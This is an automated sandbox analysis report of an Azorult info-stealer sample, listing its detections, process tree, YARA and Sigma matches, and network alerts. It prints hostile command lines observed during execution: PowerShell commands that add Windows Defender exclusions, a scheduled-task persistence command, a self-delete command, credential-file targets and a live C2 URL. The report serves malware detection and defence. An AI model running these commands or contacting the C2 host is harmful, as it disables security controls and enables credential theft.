Edit tour

Windows Analysis Report
A2h6QhZIKx.exe

Overview

General Information

Sample name:	A2h6QhZIKx.exe renamed because original name is a hash value
Original sample name:	0f9667bcf85d4706f81bc69ae26a7d182a81aeebdc830ce8795c75c73e6ab843.exe
Analysis ID:	1631840
MD5:	8a345ac0db437c164dd5fe3ffede0a63
SHA1:	4960fb0a713a8e9b8e73067fee1ce86ded2a765e
SHA256:	0f9667bcf85d4706f81bc69ae26a7d182a81aeebdc830ce8795c75c73e6ab843
Tags:	exeuser-adrian__luca
Infos:

Detection

Azorult

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Azorult

Yara detected Azorult Info Stealer

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

A2h6QhZIKx.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\A2h6QhZIKx.exe" MD5: 8A345AC0DB437C164DD5FE3FFEDE0A63)

powershell.exe (PID: 6756 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lpIWQr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6972 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5388 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6448 -s 1784 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 5176 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

lpIWQr.exe (PID: 2372 cmdline: C:\Users\user\AppData\Roaming\lpIWQr.exe MD5: 8A345AC0DB437C164DD5FE3FFEDE0A63)

WerFault.exe (PID: 4372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 1312 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1712 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://any.run/cybersecurity-blog/azorult-malware-analysis/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://k1d5.icu/TP341/index.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x94488:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x27e1d0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x29a1f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x877b0:$a2: %APPDATA%\.purple\accounts.xml 0x2714f8:$a2: %APPDATA%\.purple\accounts.xml 0x28d518:$a2: %APPDATA%\.purple\accounts.xml 0x87ef8:$a3: %TEMP%\curbuf.dat 0x271c40:$a3: %TEMP%\curbuf.dat 0x28dc60:$a3: %TEMP%\curbuf.dat 0x9420c:$a4: PasswordsList.txt 0x27df54:$a4: PasswordsList.txt 0x299f74:$a4: PasswordsList.txt 0x8f210:$a5: Software\Valve\Steam 0x278f58:$a5: Software\Valve\Steam 0x294f78:$a5: Software\Valve\Steam
00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x92650:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x92cb0:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x27c398:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x27c9f8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x2983b8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x298a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x94398:$v2: http://ip-api.com/json 0x27e0e0:$v2: http://ip-api.com/json 0x29a100:$v2: http://ip-api.com/json 0x9300a:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0x27cd52:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0x298d72:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Process Memory Space: A2h6QhZIKx.exe PID: 6448	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: A2h6QhZIKx.exe PID: 6448	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: A2h6QhZIKx.exe PID: 6448	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 5176	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5176	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: lpIWQr.exe PID: 2372	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
7.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
7.2.RegSvcs.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
7.2.RegSvcs.exe.400000.0.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
7.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
7.2.RegSvcs.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
7.2.RegSvcs.exe.400000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x79c70:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x95c90:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0x6cf98:$a2: %APPDATA%\.purple\accounts.xml 0x88fb8:$a2: %APPDATA%\.purple\accounts.xml 0x6d6e0:$a3: %TEMP%\curbuf.dat 0x89700:$a3: %TEMP%\curbuf.dat 0x799f4:$a4: PasswordsList.txt 0x95a14:$a4: PasswordsList.txt 0x749f8:$a5: Software\Valve\Steam 0x90a18:$a5: Software\Valve\Steam
0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x78098:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x940b8:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x724cc:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") 0x8e4ec:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x77e38:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x78498:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x93e58:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x944b8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x79b80:$v2: http://ip-api.com/json 0x95ba0:$v2: http://ip-api.com/json 0x787f2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0x94812:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0xda090:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xf60b0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcd3b8:$a2: %APPDATA%\.purple\accounts.xml 0xe93d8:$a2: %APPDATA%\.purple\accounts.xml 0xcdb00:$a3: %TEMP%\curbuf.dat 0xe9b20:$a3: %TEMP%\curbuf.dat 0xd9e14:$a4: PasswordsList.txt 0xf5e34:$a4: PasswordsList.txt 0xd4e18:$a5: Software\Valve\Steam 0xf0e38:$a5: Software\Valve\Steam
0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0xd84b8:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0xf44d8:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0xd28ec:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") 0xee90c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0xd8258:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xd88b8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xf4278:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xf48d8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0xd9fa0:$v2: http://ip-api.com/json 0xf5fc0:$v2: http://ip-api.com/json 0xd8c12:$v3: C6 07 1E C6 47 01 15 C6 47 02 34 0xf4c32:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\A2h6QhZIKx.exe", ParentImage: C:\Users\user\Desktop\A2h6QhZIKx.exe, ParentProcessId: 6448, ParentProcessName: A2h6QhZIKx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe", ProcessId: 6756, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\A2h6QhZIKx.exe", ParentImage: C:\Users\user\Desktop\A2h6QhZIKx.exe, ParentProcessId: 6448, ParentProcessName: A2h6QhZIKx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp", ProcessId: 5388, ProcessName: schtasks.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2h6QhZIKx.exe", ParentImage: C:\Users\user\Desktop\A2h6QhZIKx.exe, ParentProcessId: 6448, ParentProcessName: A2h6QhZIKx.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5176, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\A2h6QhZIKx.exe", ParentImage: C:\Users\user\Desktop\A2h6QhZIKx.exe, ParentProcessId: 6448, ParentProcessName: A2h6QhZIKx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe", ProcessId: 6756, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1712, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\A2h6QhZIKx.exe", ParentImage: C:\Users\user\Desktop\A2h6QhZIKx.exe, ParentProcessId: 6448, ParentProcessName: A2h6QhZIKx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp", ProcessId: 5388, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:28:51.690991+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.7	49681	104.21.96.1	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:28:51.690991+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.7	49681	104.21.96.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: A2h6QhZIKx.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://k1d5.icu/TP341/index.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\lpIWQr.exe

Avira: detection malicious, Label: TR/AD.MoksSteal.kykog

Found malware configuration

Source: 7.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Azorult {"C2 url": "http://k1d5.icu/TP341/index.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\lpIWQr.exe

ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: A2h6QhZIKx.exe	Virustotal: Detection: 66%			Perma Link
Source: A2h6QhZIKx.exe	ReversingLabs: Detection: 60%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_004094C4 CryptUnprotectData,LocalFree,

7_2_004094C4

Source: A2h6QhZIKx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: A2h6QhZIKx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Configuration.pdb.> source: WER9E51.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Accessibility.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Accessibility.pdbMontero.dll" source: WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: uQFJ.pdbSHA256rQ source: A2h6QhZIKx.exe, lpIWQr.exe.0.dr, WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Xml.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: uQFJ.pdb source: A2h6QhZIKx.exe, lpIWQr.exe.0.dr, WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdbQ_ source: WERB3ED.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdbSystem.Configuration.dll source: WER9E51.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.pdb4 source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdbD source: WER9E51.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Xml.pdb0_/s source: WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9E51.tmp.dmp.10.dr, WERB3ED.tmp.dmp.15.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041303C
